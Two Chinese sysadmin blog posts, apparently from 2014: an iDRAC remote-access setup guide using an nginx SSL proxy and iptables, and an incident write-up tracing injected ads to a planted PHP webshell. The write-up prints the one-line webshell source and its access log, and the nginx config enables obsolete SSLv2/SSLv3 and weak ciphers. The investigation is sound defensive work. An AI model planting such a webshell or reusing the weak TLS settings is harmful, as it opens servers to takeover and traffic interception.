10/28/14

【iDRAC】远程卡(iDRAC)配置手册

一、远程卡配置

1、内网IP分配规则
2、虚拟终端端口设置
3、访问帐号密码设置
4、配置方法
参考:http://wenku.baidu.com/view/de0a6bf6f61fb7360b4c65d5.html

二、外网访问配置

1、https代理

A、访问规划

域名:xxx.monitor.phpdba.com
主服务器IP:192.168.1.3
备用服务器IP:192.168.1.116
Web server:nginx ssl

B、nginx ssl搭建

 1、制作CA证书
ca.key CA 私钥:
openssl genrsa -des3 -out ca.key 2048
制作解密后的CA 私钥:
openssl rsa -in ca.key -out ca_decrypted.key
ca.crt CA 根证书(公钥):
openssl req -new -x509 -days 7305 -key ca.key -out ca.crt

2、CA签名认证
域名:phpdba.com
生成证书请求文件和密钥.需要生成2048 位加密的证书请求:
openssl req -new -newkey rsa:2048 -nodes -out phpdba.csr -keyout xinfotek.key
用CA 进行签名:
openssl ca -policy policy_anything -days 1460 -cert ca.crt -keyfile ca.key -in phpdba.csr -out phpdba.crt
其中,policy 参数允许签名的CA 和网站证书可以有不同的国家、地名等信息,days 参数则是签名时限。
如果在执行签名命令时,出现“I am unable to access the ../../CA/newcerts directory”
修改/etc/pki/tls/openssl.cnf 中“dir = ./CA”
然后:
mkdir -p CA/newcerts
touch CA/index.txt
touch CA/serial
echo “01″ > CA/serial
安装CA 根证书浏览器导入ca.crt 到根证书就可以了

3、nginx配置
A、检查nginx是否安装ssl模块
B、将*.monitor.phpdba.com解析到192.168.1.3
C、导入phpdba.crt phpdba.key存到nginx key目录下
D、Nginx ssl配置文件
E、开启nginx服务
F、浏览器访问,如:220.monitor.phpdba.com

   C、nginx ssl配置文件实例

server {
listen       443;
server_name   *.monitor.phpdba.com;
ssl on;
ssl_certificate /opt/phpdba/nginx-1.4.3/key/phpdba.crt;
ssl_certificate_key /opt/phpdba/nginx-1.4.3/key/phpdba.key;
ssl_session_timeout 5m;
ssl_protocols SSLv2 SSLv3 TLSv1;
ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP;
ssl_prefer_server_ciphers on;

location / {
set $domain default;
if ( $http_host ~* “^(.*)\.monitor\.phpdba\.com$”) {
set $domain $1;
}
              rewrite ^/(.*)  /$domain/$1;
}

location /220/  {
proxy_pass  https://192.168.0.220/;
proxy_set_header Host $host;
proxy_set_header   X-Real-IP        $remote_addr;
proxy_set_header   X-Forwarded-For  $proxy_add_x_forwarded_for;
proxy_hide_header X-Powered-By;
}
…..  //此处省略N行
location ~ /\.(ht|svn) {
deny  all;
}

2、端口转发规则

A、iptables转发

1、开启iptables FORWARD 功能:/etc/sysctl.conf配置文件的 net.ipv4.ip_forward = 1
2、配置规则(/etc/sysconfig/iptables文件添加如下规则 ):
-A PREROUTING -d xxx.xxx..17.99 -p tcp -m tcp –dport 5900 -j DNAT –to-destination 192.168.0.220:5900
-A POSTROUTING -d 192.168.0.220 -p tcp -m tcp –dport 5900 -j SNAT –to-source 192.168.0.3
3、重启防火墙,/etc/init.d/iptables restart

B、nginx_tcp_proxy_module 转发

1、下载nginx_tcp_proxy_module 模块 ,http://github.com/yaoweibin/nginx_tcp_proxy_module
2、进入nginx源码目录,在原有参数上添加–add-module=/path/to/nginx_tcp_proxy_module,重新编译nginx。
3、配置tcp代理模块

tcp {
access_log logs/tcp_access.log;
server {
listen 5900;
proxy_pass 192.168.1.150:5900;
}
}

3、通过浏览器访问iDRAC

1、浏览器输入网址,例如:https://220.monitor.phpdba.com
2、按照提示安装插件
3、输入帐号密码登录,进行操作。

三、配置注意问题

1、外网用ssl代理能访问并登录iDRAC,但是不能启动虚拟服务器,会提示“viewer 已终止,原因网络连接已中断”。
2、iDRAC使用固定IP,不要使用DHCP分配的地址。路由里DHCP的地址池范围,不要覆盖了iDRAC的固定ip,以避免IP冲突。
3、路由器分内部网段和Internet网段,如果你要测试端口的重定向,在内部网段是测试不了的。你需要从internet地址访问,才能从Internet网段连接路由器,来测试重定向功能。
4、跳过动态DNS,看看是否可以在外网通过IP地址访问到iDRAC,排除一下动态DNS可能带来的干扰。
5、参考资料

http://zh.community.dell.com/techcenter/b/weblog/archive/2012/07/11/idrac7-virtual-console-_2d00_-enhanced-security-checks-in-the-integrated-dell-remote-access-controller.aspx

http://zh.community.dell.com/techcenter/systems-management/f/156/t/9448.aspx

http://www.dell.com/learn/cn/zh/cnhied1/help-me-choose/hmc-idrac7-12g

10/24/14

【webshell】页面嵌入不雅对联广告问题排查过程

一、情况描述

1、近期很多phpdba用户反应内页有不雅图片广告,晚上8点到12点就有,白天恢复正常。
2、用户分布在全国各地,辽宁鞍山网通、上海闵行区电信都有这样的问题,电脑手机都有这情况。
3、截图列表
ask1ask2ask3

二、问题分析

1、网站被黑

由于网站漏洞客观存在,就有人利用漏洞上传webshell,修改网站源码,以彰显其技术之牛逼。一种直接破坏源网站正常业务;另一种则在网站代码中注入其广告代码,牟利。

2、第三方统计网站被劫持

我们网站使用了51yes、cnzz等第三方网站进行数据统计及分析。曾经就遇到cnzz某些地区dns被劫持,导致我们网站上面也出现不雅广告的情况,去掉该统计代码即恢复正常。

3、运营商代理劫持 (http劫持、dns劫持)

如*城宽带,网内用户所有请求都从其网关服务器透明代理经过,然后代理服务器可以在返回给用户html的过程中,在html下添加其广告代码。比如:常见的右下角的弹框广告。

三、问题定位

1、与反应问题的用户联系

a、检查了域名解析情况,都正常解析到自己服务器。【排除dns劫持情况】

b、去掉第三方统计网站代码,不雅广告依然存在。【排除第三方统计网站被劫持情况】

c、查看用户协助保存下来的html代码,发现在页面广告位308下添加了不雅广告对联代码(如下图),从而确认自己广告系统可能被篡改。先去掉了该广告位代码,恢复正常。

ask4

d、之后又有用户反馈,问题依然存在。远程用户电脑,排查问题。发现依然是广告为代码被篡改。

var phpadsbanner = '';

phpadsbanner += '<'+'li style="text-decoration: none;">» <'+'a href=\'http://tc.phpdba.com/adclick.php?bannerid=5915&amp;zoneid=109&source=&dest=http%3A%2F%2Fshop.phpdba.com%2Furls%2FBNrH7\' target=\'_blank\'>孕妈大礼包付邮试用<'+'/a><'+'/li>';
document.writeln("<script type=\"text/javascript\" >BAIDU_CLB_SLOT_ID = \"847159\";</script>");
document.writeln("<script type=\"text/javascript\" src=\"http://cbjs.baidu.com/js/o.js\"></script>");
document.write(phpadsbanner);

自己本地查看该广告位代码,同上。登录服务器查看,服务器上该广告位在19点59分58秒,被修改成上述代码,同时对方还在尝试修改其他广告位代码(如下图)。

ask6

知道修改时间段之后,就可以查看代码同步日志及apache日志。

发现可疑apache访问,锁定webshell位置

199.1.88.29, 118.244.147.95, 127.0.0.1 – - [23/Oct/2014:19:59:46 +0800] “POST /bbs/attachments/forumid_41/kcf.php?ck=assert HTTP/1.0″ 200 335 602 “http://xxx.phpdba.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0″

源码如下

ok!<?php $_GET['ck']($_POST['lan']);?>

e、将该webshell堵住,广告代码重新生成,问题暂时解决。提醒webshell利用者,请做有素质的“白帽子”,这样或许你得到的更多。

f、phpdba的安全道路上,因为有“白帽子”,会越来越光明。网络安全,需要更多“白帽子”,请加入“白帽子”队伍。

四、思考问题

以下是广告同步日志,请问从下面日志里面,你看到了什么问题,谢谢!

Thu Oct 23 19:59:51 2014 Normal: Calling rsync with filter-list of
new/modified files/dirs
/109.js
/
Thu Oct 23 19:59:51 2014 Normal: Calling rsync with filter-list of
new/modified files/dirs
/109.js
/
Thu Oct 23 19:59:51 2014 Normal: Calling rsync with filter-list of
new/modified files/dirs
/109.js
/
Thu Oct 23 19:59:51 2014 Normal: Calling rsync with filter-list of
new/modified files/dirs
/109.js
/
Thu Oct 23 19:59:51 2014 Normal: Calling rsync with filter-list of
new/modified files/dirs
/adscache/caches/109.js
/adscache/caches/
/adscache/
/
sending incremental file list
109.js
sent 665 bytes received 37 bytes 1404.00 bytes/sec